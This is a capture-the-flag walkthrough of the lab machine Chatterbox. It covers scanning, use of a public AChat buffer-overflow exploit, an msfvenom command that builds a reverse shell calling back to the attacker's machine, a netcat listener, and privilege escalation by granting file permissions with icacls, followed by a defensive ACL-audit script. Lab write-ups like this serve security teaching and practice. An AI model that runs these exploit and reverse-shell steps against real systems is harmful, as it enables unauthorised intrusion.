Chatterbox
Reconnaissance:
NMAP
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.74
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 2 hops
Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h39m59s, deviation: 2h53m14s, median: 4h59m58s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Chatterbox
| NetBIOS computer name: CHATTERBOX\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-12-21T01:16:08-05:00
| smb2-time:
| date: 2023-12-21T06:16:10
|_ start_date: 2023-12-21T06:11:26
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.74
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
500/udp open|filtered isakmp
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
5355/udp open|filtered llmnr
Enumeration:
A quick Google search on the service tells us that AChat is software that lets you chat on your local network. It can also be used to share and send files/images to other users.
In general, TCP/9255 is Monitor on Network, and TCP/9256 is unassigned. That’s not terribly helpful. However, there are multiple references to AChat, and there’s a SEH-based stack buffer overflow for it. Now that we know what it is, let’s run searchsploit on it.
┌──(kali💀kali)-[~]
└─$ searchsploit achat
-------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------- ---------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow | windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit) | windows/remote/36056.rb
MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerab | php/webapps/32958.txt
Parachat 5.5 - Directory Traversal | php/webapps/24647.txt
It’s vulnerable to a remote buffer overflow, and there is both a Python and a Metasploit exploit for it. We will of course work with the non-Metasploit solution.
Copy the python script to your current directory.
┌──(kali💀kali)-[~/Desktop]
└─$ searchsploit -m 36025
Looking at the exploit code we make note of the following things:
It looks like your classic stack buffer overflow that allows you to overflow the buffer and include malicious shell code that will get executed on the box.
The exploit author was nice enough to give us the msfvenom command that generates the malicious payload (‘buf’ variable) including the bad characters to avoid. This makes our life so much easier! The command simply spawns the calc.exe program on the target machine. So we’ll have to change the command to send a reverse shell back to our attack machine.
We also need to change the server_address to that of the IP address of Chatterbox.
There seems to be a length limit of 1152 bytes on the payload. Anything that exceeds that will probably not work. We’ll keep that in mind when using msfvenom to generate our reverse shell.
Foothold:
Use msfvenom to generate the reverse shell payload.
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=1234 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
We get back the following result.
The payload size is 774 bytes, so within the limit. Copy the payload and add it in place of the payload included in the exploit. Also change the IP address to Chatterbox’s IP address.
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('10.10.10.74', 9256)
Then set up a listener on the attack machine to receive the reverse shell.
┌──(kali💀kali)-[~]
└─$ nc -nlvp 1234
Run the exploit.
┌──(kali💀kali)-[~/Desktop]
└─$ python 36025.py
---->{P00F}!
┌──(kali💀kali)-[~]
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.74] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
chatterbox\alfred
C:\Users\Alfred\Desktop>type user.txt
type user.txt
f77d321-----------------------------
Privilege Escalation:
Display the user account information.
C:\Users\Alfred\Desktop>net user Alfred
net user Alfred
User name Alfred
Full Name
Comment
User's comment
Country code 001 (United States)
Account active Yes
Account expires Never
Password last set 12/10/2017 9:18:08 AM
Password expires Never
Password changeable 12/10/2017 9:18:08 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 12/21/2023 1:11:25 AM
Logon hours allowed All
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
Next, view all the users on the system.
C:\Users\Alfred\Desktop>net user
net user
User accounts for \\CHATTERBOX
Administrator Alfred Guest
We have three users. The user we want to compromise is the Administrator account. Next, let’s check the system privileges that are enabled for the Alfred user.
C:\Users\Alfred\Desktop>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeImpersonatePrivilege is not enabled, so we can’t use the Juicy Potato exploit to escalate privileges. Run the systeminfo command.
C:\Users\Alfred\Desktop>systeminfo
systeminfo
Host Name: CHATTERBOX
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00371-222-9819843-86663
Original Install Date: 12/10/2017, 9:18:19 AM
System Boot Time: 12/21/2023, 1:11:17 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,568 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,639 MB
Virtual Memory: In Use: 456 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\CHATTERBOX
Hotfix(s): 183 Hotfix(s) Installed.
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection 4
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.74
The box has 208 hotfixes installed so it’s unlikely that we can escalate privileges using a kernel exploit (although it might be possible, I haven’t checked).
Let’s see if we have access to the Administrator directory.
C:\Users\Administrator\Desktop>type root.txt
type root.txt
Access is denied.
We don’t have permission. View the permissions on the root.txt file.
C:\Users\Administrator\Desktop>icacls root.txt
icacls root.txt
root.txt CHATTERBOX\Administrator:(F)
Successfully processed 1 files; Failed processing 0 files
Only Administrator has full access (F) on this file. Let’s view the permissions on the Desktop directory. We must have some kind of permission on it because we’re able to enter it.
C:\Users\Administrator>icacls Desktop
icacls Desktop
Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
CHATTERBOX\Administrator:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CHATTERBOX\Alfred:(I)(OI)(CI)(F)
We have full access (F) on the Desktop directory. The Alfred user is also configured to own the root.txt file.
C:\Users\Administrator\Desktop>dir /q root.txt
dir /q root.txt
Volume in drive C has no label.
Volume Serial Number is 502F-F304
Directory of C:\Users\Administrator\Desktop
12/21/2023 01:11 AM 34 CHATTERBOX\Alfred root.txt
1 File(s) 34 bytes
0 Dir(s) 3,348,066,304 bytes free
So we can simply grant ourselves access to it using the following command.
C:\Users\Administrator\Desktop>icacls root.txt /grant alfred:F
icacls root.txt /grant alfred:F
processed file: root.txt
Successfully processed 1 files; Failed processing 0 files
View the permissions again to confirm that the change was made.
C:\Users\Administrator\Desktop>icacls root.txt
icacls root.txt
root.txt CHATTERBOX\Alfred:(F)
CHATTERBOX\Administrator:(F)
C:\Users\Administrator\Desktop>type root.txt
type root.txt
9958f---------------------------------
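The misconfiguration used above (a standard user holding full control on the Administrator's Desktop and owning root.txt) can be audited from the defender's side by parsing icacls output. The Python below is an added example, not part of the original write-up; the trusted-principal list and function names are assumptions, and the sample input is constructed from the icacls output shown above.

```python
import re

# Principals expected to control this profile (assumption for the example).
TRUSTED = {r"NT AUTHORITY\SYSTEM", r"BUILTIN\ADMINISTRATORS",
           r"CHATTERBOX\ADMINISTRATOR"}
# icacls rights that allow changing content or permissions.
RISKY = {"F", "M", "W", "WDAC", "WO"}
ACE_RE = re.compile(r"^(?P<who>.+?):(?P<groups>(?:\([^)]*\))+)$")

# Constructed sample input, modelled on the icacls output shown above.
DESKTOP_ACL = r"""Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
        CHATTERBOX\Administrator:(I)(OI)(CI)(F)
        BUILTIN\Administrators:(I)(OI)(CI)(F)
        CHATTERBOX\Alfred:(I)(OI)(CI)(F)
"""
ROOT_ACL = r"""root.txt CHATTERBOX\Administrator:(F)

Successfully processed 1 files; Failed processing 0 files
"""


def parse_icacls(path, output):
    """Return [(principal, rights)] for the allow ACEs in `icacls <path>` output."""
    aces = []
    for i, line in enumerate(output.splitlines()):
        if i == 0 and line.startswith(path):
            line = line[len(path):]  # first line is prefixed with the path
        m = ACE_RE.match(line.strip())
        if not m:
            continue  # blank lines and the "Successfully processed" summary
        groups = re.findall(r"\(([^)]*)\)", m.group("groups"))
        if "DENY" in groups:
            continue  # deny entries grant nothing
        # The last parenthesised group is the rights mask, e.g. F or R,W.
        aces.append((m.group("who"), set(groups[-1].split(","))))
    return aces


def audit(path, icacls_output, owner=None):
    """Flag untrusted principals with write-level rights, and untrusted owners."""
    findings = []
    for who, rights in parse_icacls(path, icacls_output):
        risky = rights & RISKY
        if who.upper() not in TRUSTED and risky:
            findings.append(f"{path}: {who} holds {','.join(sorted(risky))}")
    # By default an object's owner can rewrite its DACL with no ACE of their own.
    if owner and owner.upper() not in TRUSTED:
        findings.append(f"{path}: owner {owner} can rewrite the DACL")
    return findings


if __name__ == "__main__":
    for finding in (audit("Desktop", DESKTOP_ACL)
                    + audit("root.txt", ROOT_ACL, owner=r"CHATTERBOX\Alfred")):
        print(finding)
```

The owner argument corresponds to the owner column of dir /q; the root.txt ACL alone looks clean, and only the ownership check reveals why the icacls /grant command succeeded.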